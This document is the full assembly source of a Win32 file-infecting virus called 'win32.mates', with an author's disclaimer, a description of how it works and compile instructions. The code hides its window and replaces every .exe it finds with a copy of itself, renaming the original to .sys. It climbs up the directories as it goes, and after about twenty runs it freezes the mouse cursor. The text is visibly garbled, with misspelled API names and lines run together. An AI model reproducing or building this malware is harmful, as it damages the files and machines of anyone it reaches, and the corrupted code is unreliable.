Comment #
_____________________________________________________________________________________________________________________________________________________________________
...: win32.mates - virus :: ...
- Version 1.0 -
- by Dia / Auxnet -
- (c) 02 [Germany] -
_____________________________________________________________________________________________________________________________________________________________________
I am NOT RESPONSIBLE for ANY DAMAGE THAT You do! You Can NEED The code however you want ...
My Motherlanguage Is Not English, I Hope You Understand What I mean.
Feel Free to Write Any Comments TO
DIA_HATES_MACHINE@gmx.de
Why the hell "mats":
This Virus is Written for All My Mates in Real Life!
How does it work:
- Get Da Real Host's name (.sys)
- Create A Thread (Virus)
- Run Host
Virus->
- StartAfter Five Sek
- Rename Found .exe file to .sys
- Copy Itself in .exe file
- if no more filez in current directory -> cd .. (with my method) - Infect Again
- When No more Filez Check Counter
- if no payload Give Full Control to Host
PayLoad:
- New Counter Method (VIA Get / Set CaretBlinkTime)
- Set New Caret BLINK TIME
- Inc IT
- 20 STARTS OF Da Host ???
- if Yes Set New Caret Blink Time (-20) Stop The Mouse Cursor and Show a Message
- IF no inc it again and back to host
Special:
- The counter
- Hide da fucking window (with Tasm32)
- Work with threads
Here Comes Da 1st Genertion:
; ----- matessys.asm ----- Cut ------------------------------------------------------------------------------------------------------------------------------------------------------ -------------------------------
.386
.MODEL FLAT
Jumps
EXTRN Messageboxa: Proc
EXTRN EXITPROCESS: PROC
.DATA
Otitle DB 'saddle? ST generation saddle?, 0
OMSG DB 'this is da 1st generation of win32.mates - virus', 10, 13
DB 'by dia / auxnet', 10, 13
DB 'Have Fun ...', 0
.code
Start:
PUSH 0
Push Offset Otitle
Push offset omsg
PUSH 0
Call Messageboxa
PUSH 0
Call EXITPROCESS
End Start
; --------------------- Cut --------------------------- ----------------------------------------
To Compile The Mates - Virus:
TASM32 / Z / mL / m3 mats,
TLINK32-Tpe -c Mates, Mates, IMPORT32.LIB
To Compile The Mates - SYS:
Tasm32 / z / ml / m3 matsys,
TLINK32-Tpe -c Matessys, Matessys, IMPORT32.LIB
Rename mateys.exe mats.sys
#
; ------------------------------------------------- ------------------------------------------
.386
.MODEL FLAT
Jumps
; ----- Needed API's -------------------------------------------------------------------------------------------------------------------- --------------------------------
EXTRN Messageboxa: Proc
EXTRN SETCONSOLETITLEA: PROC
EXTRN SETCURSORPOS: PROC
EXTRN SETCARETBLINKTIME: PROC
EXTRN SETWINDOWPOS: PROC
EXTRN SETCURRENTDIRECTORYA: PROC
EXTRN SLEEP: PROC
EXTRN FINDWINDOWA: ProcextRn FindfirstFilea: Proc
EXTRN FINDNEXTFILEA: PROC
EXTRN CRETHREAD: PROC
EXTRN CLOSEHANDLE: PROC
EXTRN COPYFILEA: PROC
EXTRN CREATEPROCESSA: PROC
EXTRN GETCOMMANDLINEA: PROC
EXTRN GETCARETBLINKTIME: PROC
EXTRN LSTRCPYA: PROC
EXTRN EXITPROCESS: PROC
; ------------------------------------------------- ------------------------------------------
; ----- Data's for the Virus -------------------------------------- ----------------------------
.DATA
Otitle DB '[Win32.mates Version 1.0]', 0
OMSG DB 'I Wanna Say Hello To some mats:', 10, 13
db 'o DeathRider - Colorado SuckZ, Bitch;)', 10,13
DB 'o Herr H. - Smoke together!', 10, 13
DB 'o Danny - Rock' 'N roll', 10, 13
DB 'o Pascal - I Need Some Weed ..., 10, 13
DB 'and all the other fuckerz :)', 10, 13
DB 'Ride On and Thanlets for All', 10, 13, 10, 13
DB 'Greetz Dia / AuxNet', 0
Myconsoleti db '.:.', 0
Filemask DB '* .exe', 0
WindowHandle DD 0
ThreadHandle DD 0
ThreadID DD 0
FindHandle DD 0
ProcessInfo DD 4 DUP (0)
Startupinfo DD 4 DUP (0)
Win32FindData DD 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
TargetFile DB 200D DUP (0)
CreateFile DB 200D DUP (0)
VirusFile DB 200D DUP (0)
Hostfile DB 200D DUP (0)
Directory DB 200D DUP (0)
; ------------------------------------------------- ------------------------------------------
; ----- Rock 'N roll ------------------------------------------------------ ----------------------------------
.code
Mates:
; ------------------------------------------------- ------------------------------------------
; ----- Hide Da WINDOW ----------------------------------------- -------------------------------
Mov Eax, Offset MyConsoletitle
Push EAX
Call setconsoletitleacACall Sleep5; It suckz without sleep
Mov Eax, Offset MyConsoletitle
XOR EBX, EBX
Push EAX
Push EBX
Call Findwindowa
Mov DWORD PTR [WindowHandle], EAX
Call Sleep5
Mov Eax, 01
XOR EBX, EBX
Mov EDX, 20000
Push EBX
Push EAX
Push EAX
Push Edx
Push Edx
Push EBX
Push DWORD PTR [WindowHandle]
Call setWindowPOS
; ------------------------------------------------- ------------------------------------------
; ----- Create A Thread (Virus) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ -------------------------
Mov Eax, Offset ThreadID
XOR ECX, ECX
Mov Edx, Offset Runmates
Call Makethread
; ------------------------------------------------- ------------------------------------------
; --- Get Hostname (.sys) And Run IT --------------------------------- ---------------------
Call getcommandlinea; Via Command Line
Mov Edx, Offset Virusfile
Push EAX
Push Edx
Call lstrcpya
Mov ESI, Offset Virusfile; Fuck DA
Call getPoint
Add ESI, 4D
Mov DWORD PTR [ESI], 00000000H
Push Offset VirusFile 1
Push Offset Hostfile
Call lstrcpya
Mov ESI, Offset Hostfile
Call getPoint
Mov DWORD PTR [ESI], 5359532EH; Rename to .sys
Mov Eax, Offset ProcessInfo
XOR EBX, EBX
Mov ECX, 10h
Mov Edx, Offset StartupInfo
Mov Edi, Offset Hostfile
Push Eax; Run Host
Push Edx
Push EBX
Push EBX
Push ECX
Push EBX
Push EBX
Push EBX
Push EDI
Push EDI
Call CreateProcessa
Wait4mates:
JMP Wait4mates; Wait for Da Virus
; ------------------------------------------------- ------------------------------------------
; ----- Here Startz Da Virus (after 5sek) ------------------------------------ -----------------
Runmates:
Mov Eax, 5000
Push Eax; Wait 5sek Before Run
Call Sleep
; ------------------------------------------------- ----------------------------------- CD. . with another method -------------------------------------------------------------------------------------------------------------------------- ----------------
Mov Eax, Offset Hostfile
Mov Edx, Offset Directory
Push Offset Eax; Copy Host Name 2 Directory
Push Offset EDX
Call lstrcpya
MOV ESI, Offset Directory
Call getPoint
MOV EDI, ESI; Handle IT IN EDI
MOV DWORD PTR [EDI], 00000000H; Fuck Da Point
Dotdot:; IT Workz!
CMP Byte PTR [EDI], '/'
JZ Clearandset
CMP Byte PTR [EDI], ':'; C: / -> Cd .. -> Suckz
JZ Checkblink
Dec Edi
JMP Dotdot
ClearandSet:
Inc EDI
Mov DWORD PTR [EDI], 00000000H
SUB EDI, 2
MOV Eax, Offset Directory
Push EAX
Call setCurrentDirectorya
; ------------------------------------------------- ------------------------------------------
; ----- Infect Some Filez ----------------------------------------- ----------------------------
Mov Eax, Offset Win32Finddata
Mov Edx, Offset Filemask
Push EAX
Push Edx
Call FindfirstFilea
Mov DWORD PTR [FindHandle], EAX
FINDNEXT:
CMP EAX, -1; Error -> Cd ..
Je dotdot
Test Eax, Eax; No More Filez -> Cd ..
JZ Dotdot
Mov Eax, Offset Targetfile
Mov Edx, Offset Createfile
Push EAX
Push Edx
Call lstrcpya
Mov ESI, Offset Createfile
Call getPoint
Mov DWORD PTR [ESI], 5359532EH; Rename to .sys
Mov Eax, Offset Createfile
Mov Edx, Offset Targetfile
Mov ECX, 01
Call copyit
Mov Eax, Offset Targetfile
Mov Edx, Offset VirusFile 1
XOR ECX, ECX
Call copyit
Mov Eax, Offset Win32Finddata
Push Eax; Search More Filez
Push DWORD PTR [FindHandle]
Call FindnextFilea
JMP FindNext
; ------------------------------------------------- ------------------------------------------
; ----- The Funny Part ... The payload -------------------------------------------------------------------------------------------------------------------------------------------- --------------------- Checkblink:
Call getcaretblinktime; kewl counter!
MOV ESI, ESI; Handle IT in ESI
CMP ESI, 1520
Ja set1499; bigger
CMP ESI, 1500
JB set1501; Smarer Than 1500 MIL SEK
GOON:
CMP ESI, 1519
JNE EXIT; EXIT WHEN NOT 1519
Inc ESI
Call setblink; inc DA COUNTER
Mov Eax, Offset ThreadID
XOR ECX, ECX
Mov Edx, Offset Message
Call Makethread; show a nice message
Cursorsleep:; fuck Da CURSOR
Mov Eax, 666
Mov EDX, 999
Push EAX
Push Edx
Call setCursorpos
JMP CURSORSLEP; Foreva;)
EXIT:
Inc ESI
Call setblink; inc DA COUNTER
XOR EAX, EAX; NULL
Push EAX
Call EXITPROCESS; GIVE FULL Control to Host
SET1501:
Mov ESI, 1501
Call setblink
JMP Goon
SET1499:
Mov ESI, 1499; Go from Start
Call setblink
JMP EXIT
Ret; thraedend
; ------------------------------------------------- ------------------------------------------
; ----- Sleep5 Procedure ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------
Sleep5:
Mov Eax, 05
Push EAX
Call Sleep
RET
; ------------------------------------------------- ------------------------------------------
; ----- GetPoint Procedure -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------
GetPoint:
CMP Byte Ptr [ESI], '.'
JZ PointFound
Inc ESI
JMP getPoint
PointFound:
RET
; ------------------------------------------------- ------------------------------------------
; ----- Makethread Procedure ---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
Makethread:
Push EAX
Push ECX
Push ECX
Push Edx
Push ECX
Push ECX
Call CreateThread
Mov DWORD PTR [ThreadHandle], EAX
Push DWORD PTR [threadHandle]
Call Closehandle
RET
; ------------------------------------------------- ------------------------------------------; ----- Message Thread -------------------------------------------------- ----------------------
Message:
Mov Eax, Offset Otitle
Mov Edx, Offset OMSG
XOR EBX, EBX
Push EBX
Push EAX
Push Edx
Push EBX
Call Messageboxa
RET
; ------------------------------------------------- ------------------------------------------
; ----- Copyit Procedure ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------
Copyit:
Push ECX
Push EAX
Push Edx
Call Copyfilea
RET
; ------------------------------------------------- ------------------------------------------
; ----- setBlink Procedure ------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------
Setblink:
PUSH ESI
Call setcaretblinktime
RET
; ------------------------------------------------- ------------------------------------------
END MATES
